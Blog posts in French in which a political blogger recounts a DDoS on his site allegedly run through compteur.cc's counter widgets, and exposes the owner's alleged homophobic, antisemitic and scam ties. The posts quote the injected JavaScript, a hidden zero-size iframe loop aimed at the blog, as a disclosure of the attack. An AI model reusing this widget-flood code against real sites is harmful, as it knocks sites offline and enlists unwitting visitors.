A Bâbord Toute! a de nouveau fait l’objet d’une attaque de type DDOS de la part de compteur.cc qui a commencé le 12 mai aux alentours de 21H.
Mon blog faisant toujours l’objet, à l’heure où j’écris ces lignes, de visites frauduleuses, veuillez excuser les éventuelles lenteurs que vous pourriez observer lors du chargement des pages.
Pour le reste, il est désormais plus que temps de mettre les choses au clair.
Depuis hier, le site compteur.cc diffuse ce message sur sa page d’accueil:

« Parce que notre partenaire Bloguez.com essaye de protéger les enfants en interdisant le contenu adulte des blogs et parce que compteur.cc filtre les liens adultes sur ses pages pour la même raison quelques individus malsains, Pervers et jaloux essaient pas tous les moyens qui leurs sont possibles de nuire à notre image en utilisant des propos diffamatoires et des accusations imaginaires sur leurs blogs.
Nos services sont 100% gratuits et sans risque en échange d’une publicité discrète et saine, nos sponsors sont de grandes enseignes françaises et internationales de renommée avec qui nous avons conclut des partenariats.
Il faut savoir que plus de 2.5% des revenus sont reversés à des associations humanitaires et des personnes démunis.

Merci de votre confiance.
L’équipe de compteur.cc »

Outre les insultes à mon égard, on remarquera qu’ils essaient de se faire passer pour de bons samaritains. Un comble!
Mes articles (ici et ici) n’ont rien de diffamatoires ou injurieux. J’avais bien pris soin en les rédigeant qu’ils ne le soient pas afin de rester dans la légalité.
Dans la légalité, compteur.cc ne l’est pas resté en commettant ces attaques.
Voici donc un bout du code que renvoyaient les gadgets du site lors du chargement de la page d’un site en ayant installé:

?script language= »javascript »>
document.write(‘iframe src= »http://www.blog-politique-a-babord-toute.fr » width= »0″ height= »0″ frameborder= »0″>/iframe>’);
/?script>
iframe height= »0″ frameborder= »0″ width= »0″ src= »http://www.blog-politique-a-babord-toute.fr« >
html>
head>
title>403 Forbidden/title>
/head>
body>
h1>Forbidden/h1>
You don’t have permission to access / on this server.
p> /p>
hr/>
address>Apache/1.3.41 Server at www.blog-politique-a-babord-toute.fr Port 80/address>
/body>
/html>
/iframe>
noscript>a href= »http://www.compteur.cc »>Compteur/a>/noscript>

En rouge on voit la fonction qui appelle le chargement de mon blog.
A ce moment là, j’avais commencé à sécuriser mon site. Comme on peut le voir dans le code, mon blog renvoyait alors la réponse « You don’t have permission to access / on this server ». Le pirate s’en étant rendu compte et pensant que j’avais uniquement protégé la page d’accueil de mon blog, il a alors essayé de pointer ses liens vers une page aléatoire. Le code est alors devenu:

?script language= »javascript »>
document.write(’iframe src= »http://www.blog-politique-a-babord-toute.fr/?s=’+Math.floor(Math.random()*100)+’ » width= »0″ height= »0″ frameborder= »0″>/iframe>’);
/?script>

Comme on peut le voir dans le code, cela avait pour effet de charger mon blog sans l’afficher (width= »0″ height= »0″ frameborder= »0″).
Des codes tels que ceux-là j’en ai relevé tellement sur divers sites et blogs que je pourrais en faire un annuaire!
En règle général, un pirate attaquant par DDOS opère dans l’anonymat le plus total. Là, le pirate a non seulement signé son attaque mais en plus, a laissé de très nombreuses traces derrière lui ce qui rend une procédure judiciaire aisée.

En conséquence de quoi: en cas de nouvelle attaque de quelque nature qu’elle soit, menace ou pression en vue de faire retirer un contenu envers A Bâbord Toute!, tout site ami ou plate-forme de republication, une plainte sera transmise immédiatement au Procureur de la République du Tribunal de Grande Instance de Lille au titre de l’article 323-2 du code pénal pour « entrave au fonctionnement d’un système de traitement automatisé de données », qui vous rendra passible de cinq ans d’emprisonnement et de 75000 euros d’amende. En outre, une mise en demeure visant à faire cesser vos agissements sera envoyée à vos deux hébergeurs. Une procédure contre un pirate d’une attaque DDOS non identifié aurait peu de chances d’aboutir, mais contre un pirate identifié et qui laisse autant de traces que vous, ce ne sera qu’une simple formalité que je n’hésiterai pas à accomplir. A bon entendeur…

Je tiens pour finir à remercier toutes les personnes qui m’ont témoigné de leur soutien ou qui m’ont fourni une assistance technique lors de cette affaire.
Mon blog va maintenant se re-concentrer sur son sujet premier qui est la politique, sinon wikio va finir par me classer dans les blogs « nouvelles technologies » ou même « juridique »!

Mon dernier article sur les pratiques plus que douteuses des sites bloguez.com et compteur.cc n’aura pas été sans conséquences pour mon blog. A Bâbord Toute! a en effet subit des attaques toutes la journée du mardi 6 mai jusqu’à être « down » en fin de journée.

À partir de 6H, mon blog a tout d’abord fait l’objet de spam de commentaires. Plus de 800 entre 6H et 17H. Pas de doute sur leur origine, l’adresse IP leur étant associée étant la même que celle du webmaster de compteur.cc (qui m’avait déjà envoyé un mail via le formulaire de contact et dont l’IP m’était donc connue). Akismet (l’antispam de wordpress) faisant bien son travail, ces spams n’ont pas vraiment été un problème. J’en ai laissé deux exemples (sur l’article précédent): les commentaires de « visiteur » et de « 2555″, tous deux envoyés via la même IP (celle du webmaster de compteur.cc).

Le malveillant s’étant rendu compte du blocage du spam, il a alors changé de technique. À partir de 18H A Bâbord Toute! a commencé à recevoir un nombre très impressionnant de visiteurs. Quelques minutes plus tard ce sont 10000 visiteurs qui étaient connectés simultanément à mon blog. Mon site ne pouvant pas supporter un nombre aussi important de requêtes il a été assez vite « down »: plus moyen de s’y connecter en tant que visiteur ou administrateur. Je suis alors allé voir dans mes outils d’analyse qui étaient ces visiteurs et par quels chemins ils étaient arrivés sur mon blog. Premier référent: compteur.cc… Le reste des visites provenait de sites et de pays divers et variés. Après visite de quelques-uns d’entre eux je me suis rendu compte que leur seul point commun était d’afficher un gadget du site compteur.cc.

Pour faire simple, le webmaster du site incriminé a modifié le script contenu dans les compteurs pour qu’ils envoient des requêtes vers mon blog provoquant ainsi une saturation de ma bande passante et un déni de service. Les simples visiteurs passant sur les blogs affichant un gadget de ce site ont donc, bien malgré eux, participé au piratage de A Bâbord Toute!.

J’ai finalement réussi à reprendre le contrôle de mon site tard dans la soirée et à le remettre en ligne jeudi.

Finalement, cette mésaventure n’aura fait que confirmer les méthodes de voyou utilisées par ce site qui – grâce aux très nombreux compteurs installés sur blogs, sites et forums – peut facilement pirater des sites de faible et moyenne importance. Et ces attaques par déni de service sont en plus difficilement évitables (d’ailleurs si des visiteurs doués en technique connaissent un moyen efficace de s’en prémunir qu’ils n’hésitent pas à laisser leurs astuces en commentaire ou a me contacter par mail!).

Quelques conseils à renouveler donc:

• Si vous avez inséré un gadget de ce site: retirez-le! Il existe d’autres services du même genre beaucoup plus « propres ».

• Si certains de vos amis ont ces gadgets sur leur site informez-les et invitez-les à les retirer!

• Si vous êtes webmaster d’une plate-forme de blogs ou de forums, comme le suggérait Jonathan de Kazeo en commentaire de l’article précédent: interdisez l’ajout du script à vos utilisateurs. Certaines plate-forme comme Over-blog.com l’ont d’ores-et-déjà fait. Si votre blog est hébergé sur une de ces plate-formes, n’hésitez pas à contacter son webmaster.

Bref semaine chargée pour moi. Dès demain mon blog reprendra un rythme de croisière… à moins qu’il ne soit encore la cible d’attaques. Au moins si mon site est indisponible vous saurez d’où cela vient!

Je suis tombé récemment sur un article du site SOS homophobie, classé dans la rubrique « Bonnet d’âne », et qui dénonçait les conditions d’utilisations de la plateforme de blog « Bloguez.com ». Dans ces CGU, on peut en effet lire à l’article 6:
 »Seul le Membre répond de la conformité de ses pages avec la législation en vigueur.
En particulier il est interdit sur ses pages:
[...]
- de diffuser des pages dont le contenu ou la forme encourage et incite à l’homosexualité, la prostitution, la pédophilie; [...] »
Le rédacteur du site SOS homophobie a alors envoyé un message au webmaster de bloguez.com lui indiquant que contrairement à ce qu’il indiquait dans ses CGU l’homosexualité n’était pas interdite en France et que l’amalgame homosexualité, pédophilie et prostitution était injurieux.

La réponse du webmaster de bloguez.com a de quoi laisser songeur (mais a le mérite d’être clair):
Voici sa réponse :
 »Quand quelqu’un me dit que l’homosexualité a été autorisé par telle loi ou tel pays, je trouve cela tellement dégradant et insultant envers l’humain et son créateur que je préfère ne pas répondre, mais exception faite à votre noble organisation, je vous conseille d’oublier un peu la « loi » qu’un ou plusieurs humains comme vous et moi ont ajouté, crée et modifiés comme bon leur semble et pour des fins inconnues pour dire à la fin : L’homosexualité est autorisé par la loi ! Il faut savoir qu’il y a la loi divine et la loi non divine, choisissez votre camp ainsi que votre « livre ». »

J’ai alors voulu en savoir un peu plus sur ce site (hébérgé en France par « Amen », ça ne s’invente pas!). En cherchant dans les liens du site, je suis tombé sur le site « compteur.cc » proposant des compteurs de visite et autres gadgets pour blogs et ayant une étrange similitude dans sa charte graphique avec Bloguez.com. Vérification faite avec Who.is et Alexa, le propriétaire est bien le même. Mais étonnamment, dans un « top des blogs » affiché en bas de la page, certains noms de site se voient accolé un « (Adult) » qui tranche avec la pudibonderie des CGU de bloguez.com (qui interdisait également les contenus « érotiques »). Étonnant encore, quand on passe son pointeur sur les noms des sites « non-adultes » leurs adresses s’affichent dans le navigateur alors que quand on le passe sur un site « Adulte » il n’y en a aucune. Et pour cause! Ces liens « Adultes » sont en effet des leurres qui, quand on clique dessus, ouvrent un popup sur une page de publicité pour les livres d’un certain Harun Yahya. Parmi les titres: « Comment les fossiles ont renversé l’évolution », « Des secrets du Coran », « L’effondrement de la théorie de l’évolution en 20 questions » ou encore « L’Atlas de la Création ». Tiens! L’atlas de la création… Le hasard fait que j’avais évoqué ce livre dans un précédent article. Il avait en effet été envoyé dans les CDI des collèges et lycées français par un certain créationniste musulman du nom Adnan Oktar. Vérification faite, Adnan Oktar est en fait le nom de plume d’Harun Yahya.
On commence à voir un peu plus à qui on a à faire…

Et ce n’est pas tout. En faisant diverses recherche sur google je suis tout d’abord tombé sur un commentaire d’une internaute étonnée d’un détail concernant son compteur. Elle écrit donc au webmaster de compteur.cc:
 »Je me suis fait un plaisir d’afficher un compteur de votre site, mais lorsqu’un visiteur d’israel est passé, le compteur ne connaît pas le drapeau!!! je suis assez étonnée. j’aimerai recevoir un mail d’explication. merci bien. »
La réponse est assez surréaliste:
 »Bonsoir, Pourquoi vous êtes étonnées, ce pays n’est pas reconnu par les peuples du Monde pour des raisons évidentes : Il arrache les terres par le sang
Cordialement ».
Les orientations idéologiques du propriétaire de ces sites sont limpides.

Poursuivant mes recherches, je trouve beaucoup de messages se plaignant de popup produit par les gadgets de compteur.cc. Les compteurs sont en effet gratuits, mais ouvrent des pages de publicités de temps à autre. Cela est précisé dans la FAQ mais n’appairaît évidemment pas sur la page principale du site. Plus gênant, un article d’Astrubal dénonce l’affichage de popups au profit de « drive cleaner » qui est décrit par le site Secuser.com comme « un logiciel aux performances douteuses utilisant des méthodes commerciales trompeuses pour tenter de forcer la main des utilisateurs (publicités déguisées en alertes de sécurité, faux positifs volontaires destinés à inventer ou exagérer une menace, harcèlement publicitaire jusqu’à ce que l’internaute achète une licence, etc.).
Ce logiciel se présente généralement à l’internaute sous la forme d’une fausse alerte de sécurité indiquant que son ordinateur contient des fichiers dangereux ou des problèmes de sécurité critiques (alerte le plus souvent générée aléatoirement et non suite à une analyse du disque dur), et invitant à télécharger DriveCleaner pour y remédier ». Google présente d’ailleurs le site de Drive Cleaner comme « pouvant endommager votre ordinateur ».
La vidéo d’Astrulab parle d’elle-même:

Pour finir en beauté, j’ai également trouvé le nom du propriétaire des deux sites mêlé à une affaire de scam/phishing. Le procédé est classique: on promet une grosse somme d’argent au destinataire qui devra, avant de toucher son gain, s’aquitter de « frais de dossier ». Le mail en question renvoie vers un site: www.golf-finance.fr.cc. Alexa ne donne pas d’information sur le nom du propriétaire du site (enfin plus aujourd’hui en tout cas) mais nous donne un mail pour le contacter, mail qui est le même que celui indiqué pour bloguez.com et compteur.cc!

Homophobie, publicité pour un douteux créationniste musulman, partenariat avec un logiciel plus que suspect, antisémitisme, apparition dans une affaire de scam, phishing. Le propriétaire de ces sites ne semble pas être un enfant de coeur. Le pire est sans doute que sa plateforme de blog et ses compteurs s’adressent à un public jeune.
Attention donc à bloguez.com et compteur.cc, si vous utilisez ces outils vous savez maintenant quels sont les risques…